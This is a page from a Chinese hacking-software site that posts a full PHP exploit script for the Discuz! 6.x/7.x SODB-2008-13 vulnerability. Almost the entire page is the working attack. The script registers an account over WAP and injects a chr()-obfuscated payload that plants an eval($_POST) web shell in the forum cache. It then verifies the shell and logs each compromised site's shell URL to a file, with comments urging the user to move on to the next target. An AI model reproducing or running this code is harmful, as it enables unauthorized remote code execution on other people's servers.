首页 ┆ 黑客新闻 ┆ 黑客软件 ┆ 黑客学院 ┆ 精品软件 ┆ 黑客动画 ┆ 精品源码 ┆ CMS模板 ┆ 网络学院 ┆ 黑客顶吧 ┆ 黑客论坛

黑客软件园

您当前的位置：黑客软件园 → 黑客新闻 → 最新漏洞 → Discuz! 6.x/7.x SODB-2008-13 Exp（全自动获取SHELL带日志功能）

Discuz! 6.x/7.x SODB-2008-13 Exp（全自动获取SHELL带日志功能）

来源：不详作者：佚名时间：2008-11-20 14:05:41 发布：黑客软件园

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝Discuz.php＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝ #!/usr/bin/php <?php /** * Discuz! 6.x/7.x SODB-2008-13 Exp * By www.80vul.com * 文件中注释的变量值请自行修改 */ if ($argc<3) { print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].' host path host: target server (ip/hostname),without"http://" path: path to phpcms Example: php '.$argv[0].' localhost / -------------------------------------------------------------------------------- '); die; } // $host = 'www.80vul.com'; // 服务器域名或IP // $path = '/'; // 程序所在的路径这些已经由参数获取了，不用麻烦你了…… $host=$argv[1]; $path=$argv[2]; $key = 1; // 上面的变量编辑好后，请将此处的值改为1,已经改好了…… if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1) exit("专业点好不,先看看里面的注释 -,-\n"); error_reporting(7); ini_set('max_execution_time', 0); $key = time(); $cmd = 'action=register&username='.$key.'&password='.$key.'&email='.$key.'@80vul.com&_DCACHE=1'; $resp = send(); preg_match('/logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})/', $resp, $sid); if (!$sid) exit("哦,大概是没有开启WAP注册吧!检测下一个……\n"); $cmd = 'stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid='.$sid[1].'&creditsformula=${${fputs(fopen(chr(46).chr(46).chr(47).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(101).chr(118).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(56).chr(48).chr(118).chr(117).chr(108))}}'; send(); $shell = 'http://'.$host.$path.'forumdata/cache/eval.php'; if (file_get_contents($shell) == '80vul') { $filename = "resulturl.txt"; $handle = fopen ($filename,"a+"); //打开文件指针，创建文件 /* 　检查文件是否被创建且可写 */ if (!is_writable ($filename)){ die ("文件：".$filename."不可写，请检查其属性后重试！"); } /*这里写成功了下面的应该没问题，不多检测了*/ if (!fwrite ($handle,$shell)){ //将信息写入文件 die ("生成文件".$filename."失败！"); } fwrite($handle,"\r\n"); fclose ($handle); //关闭指针 exit("\n保存Shell成功!\nWebShell:\t$shell\n"); } else exit("大概是该网站不存在漏洞,换一个吧!\n"); function send() { global $host, $path, $url, $cmd; $data = "POST ".$path."wap/index.php HTTP/1.1\r\n"; $data .= "Accept: */*\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Referer: http://$host$path\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Connection: Close\r\n"; $data .= "Content-Length: ".strlen($cmd)."\r\n\r\n"; $data .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?> ＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝END＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝